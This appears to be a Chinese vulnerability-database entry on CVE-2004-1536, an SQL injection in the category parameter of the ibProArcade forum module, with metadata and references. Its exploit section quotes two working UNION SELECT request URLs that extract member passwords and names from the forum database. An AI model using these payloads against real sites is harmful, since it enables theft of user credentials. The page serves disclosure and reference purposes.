ibProArcade category输入验证SQL注入漏洞

ibProArcade category输入验证SQL注入漏洞

漏洞ID 1108284 漏洞类型 输入验证
发布时间 2004-11-20 更新时间 2005-10-20
图片[1]-ibProArcade category输入验证SQL注入漏洞-安全小百科CVE编号 CVE-2004-1536
图片[2]-ibProArcade category输入验证SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200412-1116
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/24759
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1116
|漏洞详情
ibProArcade是IPB论坛系统的一个模块。ibProArcade在处理用户提交给’category’字段的数据缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或更改数据库。提交包含恶意SQL命令的数据,提交给”category”参数,可更改原来的SQL逻辑,获得数据库敏感信息或更改数据库。
|漏洞EXP
source: http://www.securityfocus.com/bid/11719/info

A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query.

An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information.

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

For modules installed on Invision Power Board versions 2.X:
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
|参考资料

来源:XF
名称:ibproarcade-category-sql-injection(18180)
链接:http://xforce.iss.net/xforce/xfdb/18180
来源:BID
名称:11719
链接:http://www.securityfocus.com/bid/11719
来源:SECTRACK
名称:1012292
链接:http://securitytracker.com/id?1012292
来源:SECUNIA
名称:13260
链接:http://secunia.com/advisories/13260
来源:BUGTRAQ
名称:20041120IpbProArace2.5.xSQLinjection.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110098512318132&w;=2
来源:NSFOCUS
名称:7142
链接:http://www.nsfocus.net/vulndb/7142

相关推荐: D-Link DWL-900AP+ TFTP Server Arbitrary File Retrieval Vulnerability

D-Link DWL-900AP+ TFTP Server Arbitrary File Retrieval Vulnerability 漏洞ID 1101423 漏洞类型 Access Validation Error 发布时间 2002-10-21 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享